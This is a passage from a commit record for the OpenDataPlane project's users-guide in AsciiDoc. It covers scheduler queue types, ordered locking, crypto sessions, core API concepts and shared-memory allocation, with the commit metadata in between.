1\", ODP_QUEUE_TYPE_SCHED, &qp);\n\n...thread init processing\n\nwhile (1) {\n odp_event_t ev;\n odp_queue_t which_q;\n ev = odp_schedule(&which_q, <wait option>);\n ...process the event\n}\n----\n\nWith scheduled queues, events are sent to a queue, and the the sender chooses\na queue based on the service it needs. The sender does not need to know\nwhich ODP thread (on which core) or hardware accelerator will process\nthe event, but all the events on a queue are eventually scheduled and processed.\n\nAs can be seen, SCHED queues have additional attributes that are specified at\nqueue create that control how the scheduler is to process events contained\non them. These include group, priority, and synchronization class.\n\n=== Scheduler Groups\nThe scheduler's dispatching job is to return the next event from the highest\npriority SCHED queue that the caller is eligible to receive events from.\nThis latter consideration is determined by the queues _scheduler group_, which\nis set at queue create time, and by the caller's _scheduler group mask_ that\nindicates which scheduler group(s) it belongs to. Scheduler groups are\nrepresented by handles of type +odp_scheduler_group_t+ and are created by\nthe *odp_scheduler_group_create()* API. A number of scheduler groups are\n_predefined_ by ODP. These include +ODP_SCHED_GROUP_ALL+ (all threads),\n+ODP_SCHED_GROUP_WORKER+ (all worker threads), and +ODP_SCHED_GROUP_CONTROL+\n(all control threads). The application is free to create additional scheduler\ngroups for its own purpose and threads can join or leave scheduler groups\nusing the *odp_scheduler_group_join()* and *odp_scheduler_group_leave()* APIs\n\n=== Scheduler Priority\nThe +prio+ field of the +odp_queue_param_t+ specifies the queue's scheduling\npriority, which is how queues within eligible scheduler groups are selected\nfor dispatch. Queues have a default scheduling priority of NORMAL but can be\nset to HIGHEST or LOWEST according to application needs.\n\n=== Scheduler Synchronization\nIn addition to its dispatching function, which provide automatic scalability to\nODP applications in many core environments, the other main function of the\nscheduler is to provide event synchronization services that greatly simplify\napplication programming in a parallel processing environment. A queue's\nSYNC mode determines how the scheduler handles the synchronization processing\nof multiple events originating from the same queue.\n\nThree types of queue scheduler synchronization area supported: Parallel,\nAtomic, and Ordered.\n\n==== Parallel Queues\nSCHED queues that specify a sync mode of ODP_SCHED_SYNC_NONE are unrestricted\nin how events are processed.\n\n.Parallel Queue Scheduling\nimage::..\/images\/parallel_queue.svg[align=\"center\"]\n\nAll events held on parallel queues are eligible to be scheduled simultaneously\nand any required synchronization between them is the responsibility of the\napplication. Events originating from parallel queues thus have the highest\nthroughput rate, however they also potentially involve the most work on the\npart of the application. In the Figure above, four threads are calling\n*odp_schedule()* to obtain events to process. The scheduler has assigned\nthree events from the first queue to three threads in parallel. The fourth\nthread is processing a single event from the third queue. The second queue\nmight either be empty, of lower priority, or not in a scheduler group matching\nany of the threads being serviced by the scheduler.\n\n=== Atomic Queues\nAtomic queues simplify event synchronization because only a single thread may\nprocess event(s) from a given atomic queue at a time. Events scheduled from\natomic queues thus can be processed lock free because the locking is being\ndone implicitly by the scheduler. Note that the caller may receive one or\nmore events from the same atomic queue if *odp_schedule_multi()* is used. In\nthis case these multiple events all share the same atomic scheduling context.\n\n.Atomic Queue Scheduling\nimage::..\/images\/atomic_queue.svg[align=\"center\"]\n\nIn this example, no matter how many events may be held in an atomic queue,\nonly one calling thread can receive scheduled events from it at a time. Here\ntwo threads process events from two different atomic queues. Note that there\nis no synchronization between different atomic queues, only between events\noriginating from the same atomic queue. The queue context associated with the\natomic queue is held until the next call to the scheduler or until the\napplication explicitly releases it via a call to\n*odp_schedule_release_atomic()*.\n\nNote that while atomic queues simplify programming, the serial nature of\natomic queues may impair scaling.\n\n=== Ordered Queues\nOrdered queues provide the best of both worlds by providing the inherent\nscaleabilty of parallel queues, with the easy synchronization of atomic\nqueues.\n\n.Ordered Queue Scheduling\nimage::..\/images\/ordered_queue.svg[align=\"center\"]\n\nWhen scheduling events from an ordered queue, the scheduler dispatches multiple\nevents from the queue in parallel to different threads, however the scheduler\nalso ensures that the relative sequence of these events on output queues\nis identical to their sequence from their originating ordered queue.\n\nAs with atomic queues, the ordering guarantees associated with ordered queues\nrefer to events originating from the same queue, not for those originating on\ndifferent queues. Thus in this figure three thread are processing events 5, 3,\nand 4, respectively from the first ordered queue. Regardless of how these\nthreads complete processing, these events will appear in their original\nrelative order on their output queue.\n\n==== Order Preservation\nRelative order is preserved independent of whether events are being sent to\ndifferent output queues. For example, if some events are sent to output queue\nA while others are sent to output queue B then the events on these output\nqueues will still be in the same relative order as they were on their\noriginating queue. Similarly, if the processing consumes events so that no\noutput is issued for some of them (_e.g.,_ as part of IP fragment reassembly\nprocessing) then other events will still be correctly ordered with respect to\nthese sequence gaps. Finally, if multiple events are enqueued for a given\norder (_e.g.,_ as part of packet segmentation processing for MTU\nconsiderations), then each of these events will occupy the originator's\nsequence in the target output queue(s). In this case the relative order of these\nevents will be in the order that the thread issued *odp_queue_enq()* calls for\nthem.\n\nThe ordered context associated with the dispatch of an event from an ordered\nqueue lasts until the next scheduler call or until explicitly released by\nthe thread calling *odp_schedule_release_ordered()*. This call may be used\nas a performance advisory that the thread no longer requires ordering\nguarantees for the current context. As a result, any subsequent enqueues\nwithin the current scheduler context will be treated as if the thread was\noperating in a parallel queue context.\n\n==== Ordered Locking\nAnother powerful feature of the scheduler's handling of ordered queues is\n*ordered locks*. Each ordered queue has associated with it a number of ordered\nlocks as specified by the _lock_count_ parameter at queue create time.\n\nOrdered locks provide an efficient means to perform in-order sequential\nprocessing within an ordered context. For example, supposed events with relative\norder 5, 6, and 7 are executing in parallel by three different threads. An\nordered lock will enable these threads to synchronize such that they can\nperform some critical section in their originating queue order. The number of\nordered locks supported for each ordered queue is implementation dependent (and\nqueryable via the *odp_config_max_ordered_locks_per_queue()* API). If the\nimplementation supports multiple ordered locks then these may be used to\nprotect different ordered critical sections within a given ordered context.\n\n==== Summary: Ordered Queues\nTo see how these considerations fit together, consider the following code:\n\n.Processing with Ordered Queues\n[source,c]\n----\nvoid worker_thread()\n odp_init_local();\n ...other initialization processing\n\n while (1) {\n ev = odp_schedule(&which_q, ODP_SCHED_WAIT);\n ...process events in parallel\n odp_schedule_order_lock(0);\n ...critical section processed in order\n odp_schedule_order_unlock(0);\n ...continue processing in parallel\n odp_queue_enq(dest_q, ev);\n }\n}\n----\n\nThis represents a simplified structure for a typical worker thread operating\non ordered queues. Multiple events are processed in parallel and the use of\nordered queues ensures that they will be placed on +dest_q+ in the same order\nas they originated. While processing in parallel, the use of ordered locks\nenables critical sections to be processed in order within the overall parallel\nflow. When a thread arrives at the *odp_schedule_order_lock()* call, it waits\nuntil the locking order for this lock for all prior events has been resolved\nand then enters the critical section. The *odp_schedule_order_unlock()* call\nreleases the critical section and allows the next order to enter it.\n\n=== Queue Scheduling Summary\n\nNOTE: Both ordered and parallel queues improve throughput over atomic queues\ndue to parallel event processing, but require that the application take\nsteps to ensure context data synchronization if needed.\n\n== Cryptographic services\n\nODP provides support for cryptographic operations required by various security\nprotocols (e.g. IPSec). To apply a cryptographic operation to a packet a session\nmust be created first. Packets processed by a session share the same cryptographic\nparameters like algorithms, keys, initialization vectors. A session is created with\n*odp_crypto_session_create()* call. After session creation a cryptographic operation\ncan be applied to a packet using *odp_crypto_operation()* call.\nDepending on the session type - synchronous or asynchronous the operation returns\nwhen the operation completed or after the request has been submitted. In the\nasynchronous case an operation completion event will be enqueued on the session\ncompletion queue. The completion event conveys the status of the operation and\nthe result. The application has the responsibility to free the completion event.\nThe operation arguments specify for each packet the areas which are to be encrypted\nor decrypted and authenticated. Also, in asynchronous case a context can be\nassociated with a given operation and when the operation completion event is\nretrieved the associated context can be retrieved. An operation can be executed\nin-place, when the output packet is the same as the input packet or the output\npacket can be a new packet provided by the application or allocated by the\nimplementation from the session output pool.\n\ninclude::users-guide-tm.adoc[]\n\ninclude::..\/glossary.adoc[]\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"79c11f95f130fedfeb318f33b2b119885a2cec90","subject":"documentation: userguide: add packet processing description","message":"documentation: userguide: add packet processing description\n\nSigned-off-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nReviewed-by: Petri Savolainen <d528fd253b9aaf78fa72edbcc6249e82047f6ce6@nokia.com>\nReviewed-by Mike Holmes <mike.holmes@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"nmorey\/odp,erachmi\/odp,nmorey\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,erachmi\/odp,dkrot\/odp,nmorey\/odp,dkrot\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,ravineet-singh\/odp,dkrot\/odp,ravineet-singh\/odp,dkrot\/odp,nmorey\/odp,erachmi\/odp,ravineet-singh\/odp,erachmi\/odp,mike-holmes-linaro\/odp","old_file":"doc\/users-guide\/users-guide.adoc","new_file":"doc\/users-guide\/users-guide.adoc","new_contents":":doctitle: OpenDataPlane (ODP) Users-Guide\n:description: This document is intended to guide a new OpenDataPlane +\napplication developer.\n:imagesdir: ..\/images\n:toc:\n\n:numbered!:\n[abstract]\nAbstract\n--------\nThis document is intended to guide a new ODP application developer.\nFurther details about ODP may be found at the http:\/\/opendataplane.org[ODP]\nhome page.\n\n.Overview of a system running ODP applications\nimage::overview.svg[align=\"center\"]\n\nODP is an API specification that allows many implementations to provide\nplatform independence, automatic hardware acceleration and CPU scaling to\nhigh performance networking applications. This document describes how to\nwrite an application that can successfully take advantage of the API.\n\n:numbered:\n== Introduction\n.OpenDataPlane Components\nimage::odp_components.svg[align=\"center\"]\n\n.The ODP API Specification\nODP consists of three separate but related component parts. First, ODP is an\nabstract API specification that describes a functional model for\ndata plane applications. This specification covers many common data plane\napplication programming needs, such as the ability to receive, manipulate, and\ntransmit packet data, without specifying how these functions are performed. This\nis quite intentional. It is precisely because ODP APIs do not have a preferred\nembodiment that they permit innovation in how these functions can\nbe realized on various platforms that offer implementations of ODP. To achieve\nthis goal, ODP APIs are described using abstract data types whose definition\nis left up to the ODP implementer. For example, in ODP packets are referenced\nby abstract handles of type +odp_packet_t+, and packet-related APIs take\narguments of this type. What an +odp_packet_t+ actually is is not part of the\nODP API specification--that is the responsibility of each ODP implementation.\n\n.Summary: ODP API attributes:\n* Open Source, open contribution, BSD-3 licensed.\n* Vendor and platform neutral.\n* Application-centric. Covers functional needs of data plane applications.\n* Ensures portability by specifying the functional behavior of ODP.\n* Defined jointly and openly by application writers and platform implementers.\n* Architected to be implementable on a wide range of platforms efficiently\n* Sponsored, governed, and maintained by the Linaro Networking Group (LNG)\n\n.ODP Implementations\nSecond, ODP consists of multiple implementations of this API specification,\neach tailored to a specific target platform. ODP implementations determine\nhow each ODP abstract type is represented on that platform and how each ODP\nAPI is realized. On some platforms, ODP APIs will\nbe realized using specialized instructions that accelerate the functional\nbehavior specified by the API. On others, hardware co-processing engines may\ncompletely offload the API so that again it can be performed with little or no\ninvolvement by a CPU. In all cases, the application sees the same\nfunctional behavior independent of how a given platform has chosen to realize\nit. By allowing each platform the freedom to determine how best to realize each\nAPI's specified functional behavior in an optimal manner, ODP permits\napplications written to its APIs to take full advantage of the unique\ncapabilities of each platform without the application programmer needing to\nhave specialist knowledge of that platform or to be concerned with how best\nto tune the application to a particular platform. This latter consideration is\nparticularly important in Network Function Virtualization (NFV) environments\nwhere the application will run on a target platform chosen by someone else.\n\n.Summary: ODP Implementation Characteristics\n* One size does not fit all--supporting multiple implementations allows ODP\nto adapt to widely differing internals among platforms.\n* Anyone can create an ODP implementation tailored to their platform\n* Distribution and maintenance of each implementation is as owner wishes\n - Open source or closed source as business needs determine\n - Have independent release cycles and service streams\n* Allows HW and SW innovation in how ODP APIs are implemented on each platform.\n\n.Reference Implementations\nTo make it easy to get started with implementing ODP on a new platform, ODP\nsupplies a number of _reference implementations_ that can serve as a\nstarting point. The two primary references implementations supplied by ODP are\n*odp-linux* and *odp-dpdk*\n\n.odp-linux\nThe *odp-linux* reference implementation is a pure SW implementation of the\nODP API that relies only on the Linux programming API. As a functional model\nfor ODP, it enables ODP to be bootstrapped easily to any platform that\nsupports a Linux kernel.\n\n.odp-dpdk\nThe *odp-dpdk* reference implementation is a pure SW implementation of the\nODP API that uses http:\/\/dpdk.org[DPDK] as a SW accelerator. In particular,\n*odp-dpdk* offers superior I\/O performance for systems that use NICs, allowing\nODP applications to take immediate full advantage of the various NIC device\ndrivers supported by DPDK.\n\n.Summary: ODP Reference Implementations\n* Open source, open contribution, BSD-3 licensed.\n* Provide easy bootstrapping of ODP onto new platforms\n* Implementers free to borrow or tailor code as needed for their platform\n* Implementers retain full control over their implementations whether or not\nthey are derived from a reference implementation.\n\n.ODP Validation Test Suite\nThird, to ensure consistency between different ODP implementations, ODP\nconsists of a validation suite that verifies that any given implementation of\nODP faithfully provides the specified functional behavior of each ODP API.\nAs a separate open source component, the validation suite may be used by\napplication writers, system integrators, and platform providers alike to\nconfirm that any purported implementation of ODP does indeed conform to the\nODP API specification.\n\n.Summary: ODP Validation Test Suite\n* Synchronized with ODP API specification\n* Maintained and distributed by LNG\n* Open source, open contribution, BSD-3 licensed.\n* Key to ensuring application portability across all ODP implementations\n* Tests that ODP implementations conform to the specified functional behavior\nof ODP APIs.\n* Can be run at any time by users and vendors to validate implementations\nof ODP.\n\n=== ODP API Specification Versioning\nAs an evolving standard, the ODP API specification is released under an\nincrementing version number, and corresponding implementations of ODP, as well\nas the validation suite that verifies API conformance, are linked to this\nversion number. ODP versions are specified using a standard three-level\nnumber (major.minor.fixlevel) that are incremented according to the degree of\nchange the level represents. Increments to the fix level represent clarification\nof the specification or other minor changes that do not affect either the\nsyntax or semantics of the specification. Such changes in the API specification\nare expected to be rare. Increments to the minor level\nrepresent the introduction of new APIs or functional capabilities, or changes\nto he specified syntax or functional behavior of APIs and thus may require\napplication source code changes. Such changes are well documented in the\nrelease notes for each revision of the specification. Finally, increments to\nthe major level represent significant structural changes that most likely\nrequire some level of application source code change, again as documented in\nthe release notes for that version.\n\n=== ODP Implementation Versioning\nODP implementations are free to use whatever release naming\/numbering\nconventions they wish, as long as it is clear what level of the ODP API a given\nrelease implements. A recommended convention is to use the same three level\nnumbering scheme where the major and minor numbers correspond to the ODP API\nlevel and the fix level represents an implementation-defined service level\nassociated with that API level implementation. The LNG-supplied ODP reference\nimplementations follow this convention.\n\n=== ODP Validation Test Suite Versioning\nThe ODP validation test suite follows these same naming conventions. The major\nand minor release numbers correspond to the ODP API level that the suite\nvalidates and the fix level represents the service level of the validation\nsuite itself for that API level.\n\n=== ODP Design Goals\nODP has three primary goals that follow from its component structure. The first\nis application portability across a wide range of platforms. These platforms\ndiffer in terms of processor instruction set architecture, number and types of\napplication processing cores, memory organization, as well as the number and\ntype of platform specific hardware acceleration and offload features that\nare available. ODP applications can move from one conforming implementation\nto another with at most a recompile.\n\nSecond, ODP is designed to permit data plane applications to avail themselves\nof platform-specific features, including specialized hardware accelerators,\nwithout specialized programming. This is achieved by separating the API\nspecification from their implementation on individual platforms. Since each\nplatform implements each ODP API in a manner optimal to that platform,\napplications automatically gain the benefit of such optimizations without the\nneed for explicit programming.\n\nThird, ODP is designed to allow applications to scale out automatically to\nsupport many core architectures. This is done using an event based programming\nmodel that permits applications to be written to be independent of the number\nof processing cores that are available to realize application function. The\nresult is that an application written to this model does not require redesign\nas it scales from 4, to 40, to 400 cores.\n\n== Organization of this Document\nThis document is organized into several sections. The first presents a high\nlevel overview of the ODP API component areas and their associated abstract\ndata types. This section introduces ODP APIs at a conceptual level.\nThe second provides a tutorial on the programming model(s)\nsupported by ODP, paying particular attention to the event model as this\nrepresents the preferred structure for most ODP applications. This section\nbuilds on the concepts introduced in the first section and shows how ODP\napplications are structured to best realize the three ODP design goals\nmentioned earlier. The third section provides a more detailed overview of\nthe major ODP API components and is designed to serve as a companion to the\nfull reference specification for each API. The latter is intended to be used\nby ODP application programmers, as well as implementers, to understand the\nprecise syntax and semantics of each API.\n\n== ODP API Concepts\nODP programs are built around several conceptual structures that every\napplication programmer needs to be familiar with to use ODP effectively. The\nmain ODP concepts are:\nThread, Event, Queue, Pool, Shared Memory, Buffer, Packet, PktIO, Time, Timer,\nand Synchronizer.\n\n=== Thread\nThe thread is the fundamental programming unit in ODP. ODP applications are\norganized into a collection of threads that perform the work that the\napplication is designed to do. ODP threads may or may not share memory with\nother threads--that is up to the implementation. Threads come in two \"flavors\":\ncontrol and worker, that are represented by the abstract type\n+odp_thread_type_t+.\n\nA control thread is a supervisory thread that organizes\nthe operation of worker threads. Worker threads, by contrast, exist to\nperform the main processing logic of the application and employ a run to\ncompletion model. Worker threads, in particular, are intended to operate on\ndedicated processing cores, especially in many core processing environments,\nhowever a given implementation may multitask multiple threads on a single\ncore if desired (typically on smaller and lower performance target\nenvironments).\n\nIn addition to thread types, threads have associated _attributes_ such as\n_thread mask_ and _scheduler group_ that determine where they can run and\nthe type of work that they can handle. These will be discussed in greater\ndetail later.\n\n=== Event\nEvents are what threads process to perform their work. Events can represent\nnew work, such as the arrival of a packet that needs to be processed, or they\ncan represent the completion of requests that have executed asynchronously.\nEvents can also represent notifications of the passage of time, or of status\nchanges in various components of interest to the application. Events have an\nevent type that describes what it represents. Threads can create new events\nor consume events processed by them, or they can perform some processing on\nan event and then pass it along to another component for further processing.\nReferences to events are via handles of abstract type +odp_event_t+. Cast\nfunctions are provided to convert these into specific handles of the\nappropriate type represented by the event.\n\n=== Queue\nA queue is a message passing channel that holds events. Events can be\nadded to a queue via enqueue operations or removed from a queue via dequeue\noperations. The endpoints of a queue will vary depending on how it is used.\nQueues come in two major types: polled and scheduled, which will be\ndiscussed in more detail when the event model is introduced. Queues may also\nhave an associated context, which represents a persistent state for all\nevents that make use of it. These states are what permit threads to perform\nstateful processing on events as well as stateless processing.\n\nQueues are represented by handles of abstract type +odp_queue_t+.\n\n=== Pool\nA pool is a shared memory area from which elements may be drawn. Pools\nrepresent the backing store for events, among other things. Pools are\ntypically created and destroyed by the application during initialization and\ntermination, respectively, and then used during processing. Pools may be\nused by ODP components exclusively, by applications exclusively, or their\nuse may be shared between the two. Pools have an associated type that\ncharacterizes the elements that they contain. The two most important pool types\nare Buffer and Packet.\n\nPools are represented by handles of abstract type +odp_pool_t+.\n\n=== Shared Memory\nShared memory represents raw blocks of storage that are sharable between\nthreads. They are the building blocks of pools but can be used directly by\nODP applications if desired.\n\nShared memory is represented by handles of abstract type +odp_shm_t+.\n\n=== Buffer\nA buffer is a fixed sized block of shared storage that is used by ODP\ncomponents and\/or applications to realize their function. Buffers contain\nzero or more bytes of application data as well as system maintained\nmetadata that provide information about the buffer, such as its size or the\npool it was allocated from. Metadata is an important ODP concept because it\nallows for arbitrary amounts of side information to be associated with an\nODP object. Most ODP objects have associated metadata and this metadata is\nmanipulated via accessor functions that act as getters and setters for\nthis information. Getter access functions permit an application to read\na metadata item, while setter access functions permit an application to write\na metadata item. Note that some metadata is inherently read only and thus\nno setter is provided to manipulate it. When object have multiple metadata\nitems, each has its own associated getter and\/or setter access function to\ninspect or manipulate it.\n\nBuffers are represented by handles of abstract type +odp_buffer_t+.\n\n=== Packet\nPackets are received and transmitted via I\/O interfaces and represent\nthe basic data that data plane applications manipulate.\nPackets are drawn from pools of type +ODP_POOL_PACKET+.\nUnlike buffers, which are simple objects,\nODP packets have a rich set of semantics that permit their inspection\nand manipulation in complex ways to be described later. Packets also support\na rich set of metadata as well as user metadata. User metadata permits\napplications to associate an application-determined amount of side information\nwith each packet for its own use.\n\nPackets are represented by handles of abstract type +odp_packet_t+.\n\n=== PktIO\nPktIO is how ODP represents I\/O interfaces. A pktio object is a logical\nport capable of receiving and\/or transmitting packets. This may be directly\nsupported by the underlying platform as an integrated feature,\nor may represent a device attached via a PCIE or other bus.\n\nPktIOs are represented by handles of abstract type +odp_pktio_t+.\n\n=== Time\nThe time API is used to measure time intervals and track time flow of an\napplication and presents a convenient way to get access to a time source.\nThe time API consists of two main parts: local time API and global time API.\n\n==== Local time\nThe local time API is designed to be used within one thread and can be faster\nthan the global time API. The local time API cannot be used between threads as\ntime consistency is not guaranteed, and in some cases that's enough.\nSo, local time stamps are local to the calling thread and must not be shared\nwith other threads. Current local time can be read with +odp_time_local()+.\n\n==== Global time\nThe global time API is designed to be used for tracking time between threads.\nSo, global time stamps can be shared between threads. Current global time can\nbe read with +odp_time_global()+.\n\nBoth, local and global time is not wrapped during the application life cycle.\nThe time API includes functions to operate with time, such as +odp_time_diff()+,\n+odp_time_sum()+, +odp_time_cmp()+, conversion functions like\n+odp_time_to_ns()+, +odp_time_local_from_ns()+, +odp_time_global_from_ns()+.\nTo get rate of time source +odp_time_local_res()+, +odp_time_global_res()+\nare used. To wait, +odp_time_wait_ns()+ and +odp_time_wait_until()+ are used,\nduring witch a thread potentially busy loop the entire wait time.\n\nThe +odp_time_t+ opaque type represents local or global timestamps.\n\n=== Timer\nTimers are how ODP applications measure and respond to the passage of time.\nTimers are drawn from specialized pools called timer pools that have their\nown abstract type (+odp_timer_pool_t+). Applications may have many timers\nactive at the same time and can set them to use either relative or absolute\ntime. When timers expire they create events of type +odp_timeout_t+, which\nserve as notifications of timer expiration.\n\n=== Synchronizer\nMultiple threads operating in parallel typically require various\nsynchronization services to permit them to operate in a reliable and\ncoordinated manner. ODP provides a rich set of locks, barriers, and similar\nsynchronization primitives, as well as abstract types for representing various\ntypes of atomic variables. The ODP event model also makes use of queues to\navoid the need for explicit locking in many cases. This will be discussed\nin the next section.\n\n== ODP Components ==\nBuilding on ODP concepts, ODP offers several components that relate to the\nflow of work through an ODP application. These include the Classifier,\nScheduler, and Traffic Manager. These components relate to the three\nmain stages of packet processing: Receive, Process, and Transmit.\n\n=== Classifier\nThe *Classifier* provides a suite of APIs that control packet receive (RX)\nprocessing.\n\n.ODP Receive Processing with Classifier\nimage::odp_rx_processing.svg[align=\"center\"]\n\nThe classifier provides two logically related services:\n[horizontal]\nPacket parsing:: Verifying and extracting structural information from a\nreceived packet.\n\nPacket classification:: Applying *Pattern Matching Rules (PMRs)* to the\nparsed results to assign an incoming packet to a *Class of Service (CoS)*.\n\nCombined, these permit incoming packets to be sorted into *flows*, which are\nlogically related sequences of packets that share common processing\nrequirements. While many data plane applications perform stateless packet\nprocessing (_e.g.,_ for simple forwarding) others perform stateful packet\nprocessing. Flows anchor state information relating to these groups of\npackets.\n\nA CoS determines two variables for packets belonging to a flow:\n[list]\n* The pool that they will be stored in on receipt\n* The queue that they will be added to for processing\n\nThe PMRs supported by ODP permit flow determination based on combinations of\npacket field values (tuples). The main advantage of classification is that on\nmany platforms these functions are performed in hardware, meaning that\nclassification occurs at line rate as packets are being received without\nany explicit processing by the ODP application.\n\nNote that the use of the classifier is optional. Applications may directly\nreceive packets from a corresponding PktIO input queue via direct polling\nif they choose.\n\n=== Scheduler\nThe *Scheduler* provides a suite of APIs that control scalable event\nprocessing.\n\n.ODP Scheduler and Event Processing\nimage::odp_scheduling.svg[align=\"center\"]\n\nThe Scheduler is responsible for selecting and dispatching one or more events\nto a requesting thread. Event selection is based on several factors involving\nboth the queues containing schedulable events and the thread making an\n+odp_schedule()+ or +odp_schedule_multi()+ call.\n\nODP queues have a _scheduling priority_ that determines how urgently events\non them should be processed relative to events contained in other queues.\nQueues also have a _scheduler group id_ associated with them that must match\nthe associated scheduler group _thread mask_ of the thread calling the\nscheduler. This permits events to be grouped for processing into classes and\nhave threads that are dedicated to processing events from specified classes.\nThreads can join and leave scheduler groups dynamically, permitting easy\napplication response to increases in demand.\n\nWhen a thread receives an event from the scheduler, it in turn can invoke\nother processing engines via ODP APIs (_e.g.,_ crypto processing) that\ncan operate asynchronously. When such processing is complete, the result is\nthat a *completion event* is added to a schedulable queue where it can be\nscheduled back to a thread to continue processing with the results of the\nrequested asynchronous operation.\n\nThreads themselves can enqueue events to queues for downstream processing\nby other threads, permitting flexibility in how applications structure\nthemselves to maximize concurrency.\n\n=== Traffic Manager\nThe *Traffic Manager* provides a suite of APIs that control traffic shaping and\nQuality of Service (QoS) processing for packet output.\n\n.ODP Transmit processing with Traffic Manager\nimage::odp_traffic_manager.svg[align=\"center\"]\n\nThe final stage of packet processing is to transmit it. Here, applications have\nseveral choices. As with RX processing, applications may send packets\ndirectly to PktIO TX queues for direct transmission. Often, however,\napplications need to perform traffic shaping and related\n*Quality of Service (QoS)* processing on the packets comprising a flow as part\nof transmit processing. To handle this need, ODP provides a suite of\n*Traffic Manager* APIs that permit programmatic establishment of arbiters,\nshapers, etc. that control output packet processing to achieve desired QoS\ngoals. Again, the advantage here is that on many platforms traffic management\nfunctions are implemented in hardware, permitting transparent offload of\nthis work.\n\n== ODP Application Programming\nAt the highest level, an *ODP Application* is a program that uses one or more\nODP APIs. Because ODP is a framework rather than a programming environment,\napplications are free to also use other APIs that may or may not provide the\nsame portability characteristics as ODP APIs.\n\nODP applications vary in terms of what they do and how they operate, but in\ngeneral all share the following characteristics:\n\n. They are organized into one or more _threads_ that execute in parallel.\n. These threads communicate and coordinate their activities using various\n_synchronization_ mechanisms.\n. They receive packets from one or more _packet I\/O interfaces_.\n. They examine, transform, or otherwise process packets.\n. They transmit packets to one or more _packet I\/O interfaces_.\n\nODP provides APIs to assist in each of these areas.\n\n=== The include structure\nApplications only include the 'include\/odp.h' file, which includes the\n'platform\/<implementation name>\/include\/odp' files to provide a complete\ndefinition of the API on that platform. The doxygen documentation defining\nthe behavior of the ODP API is all contained in the public API files, and the\nactual definitions for an implementation will be found in the per platform\ndirectories. Per-platform data that might normally be a +#define+ can be\nrecovered via the appropriate access function if the #define is not directly\nvisible to the application.\n\n.Users include structure\n----\n.\/\n\u251c\u2500\u2500 include\/\n\u2502 \u251c\u2500\u2500 odp\/\n\u2502 \u2502 \u2514\u2500\u2500 api\/\n\u2502 \u2502 \u2514\u2500\u2500 The Public API and the documentation.\n\u2502 \u2502\n\u2502 \u2514\u2500\u2500 odp.h This file should be the only file included by the application.\n----\n\n=== Initialization\nIMPORTANT: ODP depends on the application to perform a graceful shutdown,\ncalling the terminate functions should only be done when the application is\nsure it has closed the ingress and subsequently drained all queues, etc.\n\n=== Startup\nThe first API that must be called by an ODP application is 'odp_init_global()'.\nThis takes two pointers. The first, +odp_init_t+, contains ODP initialization\ndata that is platform independent and portable, while the second,\n+odp_platform_init_t+, is passed unparsed to the implementation\nto be used for platform specific data that is not yet, or may never be\nsuitable for the ODP API.\n\nCalling odp_init_global() establishes the ODP API framework and MUST be\ncalled before any other ODP API may be called. Note that it is only called\nonce per application. Following global initialization, each thread in turn\ncalls 'odp_init_local()' is called. This establishes the local ODP thread\ncontext for that thread and MUST be called before other ODP APIs may be\ncalled by that thread.\n\n=== Shutdown\nShutdown is the logical reverse of the initialization procedure, with\n'odp_term_local()' called for each thread before 'odp_term_global()' is\ncalled to terminate ODP.\n\n.ODP Application Structure Flow Diagram\nimage::resource_management.svg[align=\"center\"]\n\n== Common Conventions\nMany ODP APIs share common conventions regarding their arguments and return\ntypes. This section highlights some of the more common and frequently used\nconventions.\n\n=== Handles and Special Designators\nODP resources are represented via _handles_ that have abstract type\n_odp_resource_t_. So pools are represented by handles of type +odp_pool_t+,\nqueues by handles of type +odp_queue_t+, etc. Each such type\nhas a distinguished type _ODP_RESOURCE_INVALID_ that is used to indicate a\nhandle that does not refer to a valid resource of that type. Resources are\ntypically created via an API named _odp_resource_create()_ that returns a\nhandle of type _odp_resource_t_ that represents the created object. This\nreturned handle is set to _ODP_RESOURCE_INVALID_ if, for example, the\nresource could not be created due to resource exhaustion. Invalid resources\ndo not necessarily represent error conditions. For example, +ODP_EVENT_INVALID+\nin response to an +odp_queue_deq()+ call to get an event from a queue simply\nindicates that the queue is empty.\n\n=== Addressing Scope\nUnless specifically noted in the API, all ODP resources are global to the ODP\napplication, whether it runs as a single process or multiple processes. ODP\nhandles therefore have common meaning within an ODP application but have no\nmeaning outside the scope of the application.\n\n=== Resources and Names\nMany ODP resource objects, such as pools and queues, support an\napplication-specified character string _name_ that is associated with an ODP\nobject at create time. This name serves two purposes: documentation, and\nlookup. The lookup function is particularly useful to allow an ODP application\nthat is divided into multiple processes to obtain the handle for the common\nresource.\n\n== Shared memory\n=== Allocating shared memory\nBlocks of shared memory can be created using the +odp_shm_reserve()+ API\ncall. The call expects a shared memory block name, a block size, an alignment\nrequirement, and optional flags as parameters. It returns a +odp_shm_t+\nhandle. The size and alignment requirement are given in bytes.\n\n.creating a block of shared memory\n[source,c]\n----\n#define ALIGNMENT 128\n#define BLKNAME \"shared_items\"\n\nodp_shm_t shm;\nuint32_t shm_flags = 0;\n\ntypedef struct {\n...\n} shared_data_t;\n\nshm = odp_shm_reserve(BLKNAME, sizeof(shared_data_t), ALIGNMENT, shm_flags);\n----\n\n=== Getting the shared memory block address\nThe returned odp_shm_t handle can then be used to retrieve the actual\naddress (in the caller's ODP thread virtual address space) of the created\nshared memory block.\n\n.getting the address of a shared memory block\n[source,c]\n----\nshared_data_t *shared_data;\nshared_data = odp_shm_addr(shm);\n----\n\nThe address returned by +odp_shm_addr()+ is valid only in the calling ODP\nthread space: odp_shm_t handles can be shared between ODP threads and remain\nvalid within any threads, whereas the address returned by +odp_shm_addr(shm)+\nmay differ from ODP threads to ODP threads (for the same 'shm' block), and\nshould therefore not be shared between ODP threads.\nFor instance, it would be correct to send a shm handle using IPC between two\nODP threads and let each of these thread do their own +odp_shm_addr()+ to\nget the block address. Directly sending the address returned by\n+odp_shm_addr()+ from one ODP thread to another would however possibly fail\n(the address may have no sense in the receiver address space).\n\nThe address returned by +odp_shm_addr()+ is nevertheless guaranteed to be\naligned according to the alignment requirements provided at block creation\ntime, even if the call to +odp_shm_addr()+ is performed by a different ODP\nthread than the one which originally called +odp_shm_reserve()+.\n\nAll shared memory blocks are contiguous in any ODP thread addressing space:\n'address' to 'address'\\+'size' (where 'size' is the shared memory block size,\nas provided in the +odp_shm_reserve()+ call) is read and 